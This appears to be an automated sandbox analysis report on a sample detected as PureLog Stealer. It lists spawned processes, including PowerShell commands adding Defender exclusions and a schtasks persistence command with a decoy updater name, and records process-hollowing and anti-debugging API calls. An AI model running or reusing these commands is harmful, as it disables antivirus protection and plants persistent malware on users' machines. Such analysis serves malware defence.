                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
                                                                                        Imagebase:0xfa0000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:10
                                                                                        Start time:13:40:08
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:12
                                                                                        Start time:13:40:13
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\WindowsUpdaterConf.exe'
                                                                                        Imagebase:0xfa0000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:13
                                                                                        Start time:13:40:13
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:14
                                                                                        Start time:13:40:14
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\file.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\file.exe"
                                                                                        Imagebase:0xe80000
                                                                                        File size:3'507'712 bytes
                                                                                        MD5 hash:7823E902900881094372948957825FE1
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\file.exe, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 47%, ReversingLabs
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:19
                                                                                        Start time:13:40:20
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5780 -s 1216
                                                                                        Imagebase:0xd50000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:20
                                                                                        Start time:13:40:22
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsUpdaterConf.exe'
                                                                                        Imagebase:0xfa0000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:21
                                                                                        Start time:13:40:22
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:22
                                                                                        Start time:13:40:22
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\file.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\file.exe"
                                                                                        Imagebase:0xf0000
                                                                                        File size:3'507'712 bytes
                                                                                        MD5 hash:7823E902900881094372948957825FE1
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:24
                                                                                        Start time:13:40:28
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3020 -s 1140
                                                                                        Imagebase:0xd50000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:25
                                                                                        Start time:13:40:32
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsUpdaterConf" /tr "C:\Users\user\WindowsUpdaterConf.exe"
                                                                                        Imagebase:0xa0000
                                                                                        File size:187'904 bytes
                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:26
                                                                                        Start time:13:40:32
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:27
                                                                                        Start time:13:40:33
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Users\user\WindowsUpdaterConf.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\WindowsUpdaterConf.exe
                                                                                        Imagebase:0x360000
                                                                                        File size:3'507'712 bytes
                                                                                        MD5 hash:7823E902900881094372948957825FE1
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\WindowsUpdaterConf.exe, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 47%, ReversingLabs
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:29
                                                                                        Start time:13:40:39
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5960 -s 1204
                                                                                        Imagebase:0xd50000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:30
                                                                                        Start time:13:40:41
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Users\user\WindowsUpdaterConf.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\WindowsUpdaterConf.exe"
                                                                                        Imagebase:0xb60000
                                                                                        File size:3'507'712 bytes
                                                                                        MD5 hash:7823E902900881094372948957825FE1
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:31
                                                                                        Start time:13:40:47
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 6184 -ip 6184
                                                                                        Imagebase:0xd50000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:32
                                                                                        Start time:13:40:47
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6184 -s 1144
                                                                                        Imagebase:0xd50000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:33
                                                                                        Start time:13:40:49
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Users\user\WindowsUpdaterConf.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\WindowsUpdaterConf.exe"
                                                                                        Imagebase:0xf30000
                                                                                        File size:3'507'712 bytes
                                                                                        MD5 hash:7823E902900881094372948957825FE1
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:35
                                                                                        Start time:13:40:55
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 1164
                                                                                        Imagebase:0xd50000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:37
                                                                                        Start time:13:42:00
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Users\user\WindowsUpdaterConf.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\WindowsUpdaterConf.exe
                                                                                        Imagebase:0xcd0000
                                                                                        File size:3'507'712 bytes
                                                                                        MD5 hash:7823E902900881094372948957825FE1
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:39
                                                                                        Start time:13:42:06
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5688 -s 1148
                                                                                        Imagebase:0xd50000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:40
                                                                                        Start time:13:43:00
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Users\user\WindowsUpdaterConf.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\WindowsUpdaterConf.exe
                                                                                        Imagebase:0xb30000
                                                                                        File size:3'507'712 bytes
                                                                                        MD5 hash:7823E902900881094372948957825FE1
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:42
                                                                                        Start time:13:43:06
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 1132
                                                                                        Imagebase:0xd50000
                                                                                        File size:483'680 bytes
                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:43
                                                                                        Start time:13:44:00
                                                                                        Start date:05/12/2024
                                                                                        Path:C:\Users\user\WindowsUpdaterConf.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\WindowsUpdaterConf.exe
                                                                                        Imagebase:0xa80000
                                                                                        File size:3'507'712 bytes
                                                                                        MD5 hash:7823E902900881094372948957825FE1
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000002B.00000002.4172310149.00000000042F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Has exited:false

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:16.1%
                                                                                          Dynamic/Decrypted Code Coverage:97.5%
                                                                                          Signature Coverage:6.6%
                                                                                          Total number of Nodes:121
                                                                                          Total number of Limit Nodes:2
                                                                                          execution_graph 7118 6287b70 7119 6287b95 7118->7119 7123 61c42f0 7119->7123 7127 61c42e0 7119->7127 7120 6287cb0 7131 61c5a20 7123->7131 7158 61c59f0 7123->7158 7124 61c4303 7124->7120 7128 61c4303 7127->7128 7129 61c5a20 10 API calls 7127->7129 7130 61c59f0 10 API calls 7127->7130 7128->7120 7129->7128 7130->7128 7132 61c5a85 7131->7132 7185 61c5664 7132->7185 7190 61c5670 7132->7190 7134 61c5bb4 7136 61c5e9a 7134->7136 7208 61c5298 7134->7208 7213 61c52a0 7134->7213 7135 61c5c7d 7135->7136 7217 61c537f 7135->7217 7221 61c5380 7135->7221 7136->7124 7137 61c5dcd 7147 61c537f WriteProcessMemory 7137->7147 7148 61c5380 WriteProcessMemory 7137->7148 7138 61c5cd0 7138->7136 7138->7137 7143 61c537f WriteProcessMemory 7138->7143 7144 61c5380 WriteProcessMemory 7138->7144 7139 61c5e0c 7139->7136 7149 61c50e8 Wow64SetThreadContext 7139->7149 7150 61c5140 Wow64SetThreadContext 7139->7150 7151 61c5111 Wow64SetThreadContext 7139->7151 7140 61c5e81 7140->7136 7225 31c8b40 7140->7225 7143->7138 7144->7138 7147->7139 7148->7139 7149->7140 7150->7140 7151->7140 7159 61c5a1e 7158->7159 7172 61c5664 CreateProcessA 7159->7172 7173 61c5670 CreateProcessA 7159->7173 7160 61c5b08 7163 61c5e9a 7160->7163 7181 61c50e8 Wow64SetThreadContext 7160->7181 7182 61c5140 Wow64SetThreadContext 7160->7182 7183 61c5111 Wow64SetThreadContext 7160->7183 7161 61c5bb4 7161->7163 7168 61c5298 VirtualAllocEx 7161->7168 7169 61c52a0 VirtualAllocEx 7161->7169 7162 61c5c7d 7162->7163 7179 61c537f WriteProcessMemory 7162->7179 7180 61c5380 WriteProcessMemory 7162->7180 7163->7124 7164 61c5dcd 7174 61c537f WriteProcessMemory 7164->7174 7175 61c5380 WriteProcessMemory 7164->7175 7165 61c5cd0 7165->7163 7165->7164 7170 61c537f WriteProcessMemory 7165->7170 7171 61c5380 WriteProcessMemory 7165->7171 7166 61c5e0c 7166->7163 7176 61c50e8 Wow64SetThreadContext 7166->7176 7177 61c5140 Wow64SetThreadContext 7166->7177 7178 61c5111 Wow64SetThreadContext 7166->7178 7167 61c5e81 7167->7163 7184 31c8b40 CloseHandle 7167->7184 7168->7162 7169->7162 7170->7165 7171->7165 7172->7160 7173->7160 7174->7166 7175->7166 7176->7167 7177->7167 7178->7167 7179->7165 7180->7165 7181->7161 7182->7161 7183->7161 7184->7163 7187 61c566a 7185->7187 7186 61c55f6 7186->7136 7194 61c5111 7186->7194 7199 61c50e8 7186->7199 7204 61c5140 7186->7204 7187->7186 7188 61c585e CreateProcessA 7187->7188 7189 61c58bb 7188->7189 7189->7189 7191 61c5691 CreateProcessA 7190->7191 7193 61c58bb 7191->7193 7193->7193 7195 61c50c6 7194->7195 7196 61c513f Wow64SetThreadContext 7194->7196 7195->7134 7198 61c51cd 7196->7198 7198->7134 7200 61c516c Wow64SetThreadContext 7199->7200 7201 61c50f6 7199->7201 7203 61c51cd 7200->7203 7201->7134 7203->7134 7205 61c516c Wow64SetThreadContext 7204->7205 7207 61c51cd 7205->7207 7207->7134 7209 61c529f VirtualAllocEx 7208->7209 7210 61c5226 7208->7210 7212 61c531d 7209->7212 7210->7135 7212->7135 7214 61c52e0 VirtualAllocEx 7213->7214 7216 61c531d 7214->7216 7216->7135 7218 61c53c8 WriteProcessMemory 7217->7218 7220 61c5416 7218->7220 7220->7138 7222 61c53c8 WriteProcessMemory 7221->7222 7224 61c5416 7222->7224 7224->7138 7226 31c8b80 CloseHandle 7225->7226 7228 31c8bb1 7226->7228 7228->7136 7086 61c2c50 7087 61c2c6e 7086->7087 7090 61c2dd0 7087->7090 7094 61c2e08 7090->7094 7097 61c2e02 7090->7097 7091 61c2cbb 7095 61c2e4c CheckRemoteDebuggerPresent 7094->7095 7096 61c2e8e 7095->7096 7096->7091 7098 61c2e4c CheckRemoteDebuggerPresent 7097->7098 7099 61c2e8e 7098->7099 7099->7091 7100 31c0850 7101 31c0859 7100->7101 7104 31c34bd 7100->7104 7107 31c3be2 7100->7107 7110 31c88c0 7104->7110 7109 31c88c0 VirtualProtect 7107->7109 7108 31c3bf8 7109->7108 7112 31c88d3 7110->7112 7114 31c8970 7112->7114 7115 31c89b8 VirtualProtect 7114->7115 7117 31c34d6 7115->7117 7229 61c4720 7230 61c473e 7229->7230 7236 61c4c20 7230->7236 7231 61c47a8 7234 61c4c20 Wow64SetThreadContext 7231->7234 7240 61c4d60 7231->7240 7232 61c4c03 7234->7232 7237 61c4c54 7236->7237 7238 61c4d08 7237->7238 7239 61c50e8 Wow64SetThreadContext 7237->7239 7238->7231 7239->7238 7241 61c4cf6 7240->7241 7242 61c4d08 7241->7242 7243 61c50e8 Wow64SetThreadContext 7241->7243 7242->7232 7243->7242

                                                                                          Executed Functions

                                                                                          Function 06288C18 Relevance: 11.3, Strings: 7, Instructions: 2546COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 0 6288c18-6288c83 call 6280040 call 628bf28 6 6288c89-628bec4 0->6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %1K$(K1$9Gxv$9Gxv$=<R3${u(F$C\
                                                                                          • API String ID: 0-857792947
                                                                                          • Opcode ID: a433b7d98ec2ca38daef03b23a5cd4adaeb49823cc0b7f10aad33d0a95a5df57
                                                                                          • Instruction ID: 9fe229cbca76f1fd52953f32946e4c2e7f7f3ba31bfa866d2a6be7c7e3385a63
                                                                                          • Opcode Fuzzy Hash: a433b7d98ec2ca38daef03b23a5cd4adaeb49823cc0b7f10aad33d0a95a5df57
                                                                                          • Instruction Fuzzy Hash: A6532B38A012198FCB54EF68D99969AB7F2FB99301F1081E9D909E7344DB349F85CF81
                                                                                          Function 031C8D58 Relevance: 7.0, Strings: 5, Instructions: 713COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 522 31c8d58-31c8d8a 524 31c9254-31c9261 522->524 525 31c8d90-31c8da1 522->525 528 31c9267-31c9272 524->528 526 31c8da8-31c8e5c 525->526 527 31c8da3 525->527 571 31c9199-31c91bd 526->571 572 31c8e62-31c8e6a 526->572 527->526 529 31c9682-31c968e 528->529 531 31c9694-31c96a8 529->531 532 31c9280-31c928c 529->532 533 31c966f-31c9674 532->533 534 31c9292-31c9312 532->534 541 31c967f 533->541 553 31c932a-31c9343 534->553 554 31c9314-31c931a 534->554 541->529 559 31c9345-31c936e 553->559 560 31c9373-31c93b1 553->560 555 31c931c 554->555 556 31c931e-31c9320 554->556 555->553 556->553 559->541 579 31c93d6-31c93e3 560->579 580 31c93b3-31c93d4 560->580 581 31c9241-31c9247 571->581 573 31c8e6c-31c8e70 572->573 574 31c8e71-31c8e79 572->574 573->574 577 31c8e7e-31c8ea0 574->577 578 31c8e7b 574->578 587 31c8ea5-31c8eab 577->587 588 31c8ea2 577->588 578->577 589 31c93ea-31c93f0 579->589 580->589 584 31c9249 581->584 585 31c9251 581->585 584->585 585->524 590 31c9120-31c912b 587->590 591 31c8eb1-31c8ecb 587->591 588->587 593 31c940f-31c9461 589->593 594 31c93f2-31c940d 589->594 595 31c912d 590->595 596 31c9130-31c9169 call 31c0138 call 31c8118 590->596 597 31c8ecd-31c8ed1 591->597 598 31c8f10-31c8f19 591->598 631 31c957c-31c95be 593->631 632 31c9467-31c946c 593->632 594->593 595->596 633 31c916b-31c918f call 31c8380 * 2 596->633 634 31c9191 596->634 597->598 602 31c8ed3-31c8ede 597->602 600 31c923c 598->600 601 31c8f1f-31c8f2f 598->601 600->581 601->600 604 31c8f35-31c8f46 601->604 607 31c8f6c-31c8fc7 602->607 608 31c8ee4 602->608 604->600 611 31c8f4c-31c8f5c 604->611 620 31c8fc9 607->620 621 31c8fd7-31c90b7 607->621 609 31c8ee7-31c8ee9 608->609 612 31c8eef-31c8efa 609->612 613 31c8eeb 609->613 611->600 615 31c8f62-31c8f69 611->615 612->600 619 31c8f00-31c8f0c 612->619 613->612 615->607 619->609 623 31c8f0e 619->623 620->621 625 31c8fcb-31c8fd1 620->625 635 31c90bd-31c90c1 621->635 636 31c91c2-31c91d4 621->636 623->607 625->621 661 31c95da-31c95e9 631->661 662 31c95c0-31c95d8 631->662 640 31c9476-31c9479 632->640 633->634 634->571 635->636 639 31c90c7-31c90d6 635->639 636->600 638 31c91d6-31c91f3 636->638 638->600 643 31c91f5-31c9211 638->643 644 31c90d8 639->644 645 31c9116-31c911a 639->645 646 31c947f 640->646 647 31c9544-31c956c 640->647 643->600 649 31c9213-31c9231 643->649 650 31c90de-31c90e0 644->650 645->590 645->591 651 31c94e8-31c9514 646->651 652 31c9486-31c94b2 646->652 653 31c9516-31c9542 646->653 654 31c94b7-31c94e3 646->654 657 31c9572-31c9576 647->657 649->600 658 31c9233 649->658 659 31c90ea-31c9106 650->659 660 31c90e2-31c90e6 650->660 651->657 652->657 653->657 654->657 657->631 657->640 658->600 659->600 665 31c910c-31c9114 659->665 660->659 668 31c95f2-31c966d 661->668 662->668 665->645 665->650 668->541
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1754219747.00000000031C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031C0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_31c0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$TJkq$Tefq$pjq$xbiq
                                                                                          • API String ID: 0-2688501482
                                                                                          • Opcode ID: 9a55369b938433ba48f17b21e3200a77afe636d8c5b3df70b4c404537cef38aa
                                                                                          • Instruction ID: a99a13d6d935697de8d76e53f22920c0d58ab43a1475843892a6966db3cc8a2a
                                                                                          • Opcode Fuzzy Hash: 9a55369b938433ba48f17b21e3200a77afe636d8c5b3df70b4c404537cef38aa
                                                                                          • Instruction Fuzzy Hash: 34523775A10224DFCB55DFA8C984E9DBBB2FF48310F1581A8E509AB262CB31ED91DF40
                                                                                          Function 06287D68 Relevance: 7.0, Strings: 5, Instructions: 706COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 674 6287d68-6287d9a 676 6287da0-6287db1 674->676 677 6288264-6288282 674->677 678 6287db8-6287e6c 676->678 679 6287db3 676->679 682 6288671-628867d 677->682 723 62881a9-62881cd 678->723 724 6287e72-6287e7a 678->724 679->678 683 6288290-628829c 682->683 684 6288683-6288697 682->684 687 628865e-6288663 683->687 688 62882a2-6288322 683->688 692 628866e 687->692 705 628833a-6288353 688->705 706 6288324-628832a 688->706 692->682 711 6288383-62883c1 705->711 712 6288355-628837e 705->712 708 628832c 706->708 709 628832e-6288330 706->709 708->705 709->705 730 62883c3-62883e4 711->730 731 62883e6-62883f3 711->731 712->692 733 6288251-6288257 723->733 726 6287e7c-6287e80 724->726 727 6287e81-6287e89 724->727 726->727 728 6287e8b 727->728 729 6287e8e-6287eb0 727->729 728->729 739 6287eb2 729->739 740 6287eb5-6287ebb 729->740 741 62883fa-6288400 730->741 731->741 736 6288259 733->736 737 6288261 733->737 736->737 737->677 739->740 742 6288130-628813b 740->742 743 6287ec1-6287edb 740->743 745 628841f-6288471 741->745 746 6288402-628841d 741->746 747 628813d 742->747 748 6288140-6288179 call 6287578 742->748 749 6287edd-6287ee1 743->749 750 6287f20-6287f29 743->750 784 628857d-62885ad 745->784 785 6288477-628847a 745->785 746->745 747->748 781 628817b-628819f call 62877e0 * 2 748->781 782 62881a1 748->782 749->750 753 6287ee3-6287eee 749->753 751 628824c 750->751 752 6287f2f-6287f3f 750->752 751->733 752->751 755 6287f45-6287f56 752->755 758 6287f7c-6287fd7 753->758 759 6287ef4 753->759 755->751 761 6287f5c-6287f6c 755->761 770 6287fd9 758->770 771 6287fe7-62880c7 758->771 762 6287ef7-6287ef9 759->762 761->751 763 6287f72-6287f79 761->763 767 6287efb 762->767 768 6287eff-6287f0a 762->768 763->758 767->768 768->751 772 6287f10-6287f1c 768->772 770->771 773 6287fdb-6287fe1 770->773 789 62880cd-62880d1 771->789 790 62881d2-62881e4 771->790 772->762 775 6287f1e 772->775 773->771 775->758 781->782 782->723 802 62885c9-62885d8 784->802 803 62885af-62885c7 784->803 786 6288480 785->786 787 6288545-628856d 785->787 792 62884b8-62884e4 786->792 793 62884e9-6288515 786->793 794 6288487-62884b3 786->794 795 6288517-6288543 786->795 805 6288573-6288577 787->805 789->790 791 62880d7-62880e6 789->791 790->751 798 62881e6-6288203 790->798 800 62880e8 791->800 801 6288126-628812a 791->801 792->805 793->805 794->805 795->805 798->751 799 6288205-6288221 798->799 799->751 806 6288223-6288241 799->806 807 62880ee-62880f0 800->807 801->742 801->743 809 62885e1-6288643 802->809 803->809 805->784 805->785 806->751 814 6288243 806->814 815 62880fa-6288116 807->815 816 62880f2-62880f6 807->816 821 628864e-628865c 809->821 814->751 815->751 817 628811c-6288124 815->817 816->815 817->801 817->807 821->692
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1760488024.0000000006280000.00000040.00000800.00020000.00000000.sdmp, Offset: 06280000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6280000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$TJkq$Tefq$pjq$xbiq
                                                                                          • API String ID: 0-2688501482
                                                                                          • Opcode ID: 2f5489dcc15b3b668029389aa0ca63a705f4546bcfd33c503c41c3c173e3b6e1
                                                                                          • Instruction ID: b838731d525c93e43f0e7311eca597a72a00f00b7a782d381b8767992b3b64ca
                                                                                          • Opcode Fuzzy Hash: 2f5489dcc15b3b668029389aa0ca63a705f4546bcfd33c503c41c3c173e3b6e1
                                                                                          • Instruction Fuzzy Hash: 75524875A11214DFDB55DFA8CD84E98BBB2FF48300F558198E909AB2A2CB35EC91CF50
                                                                                          Function 061C2E08 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
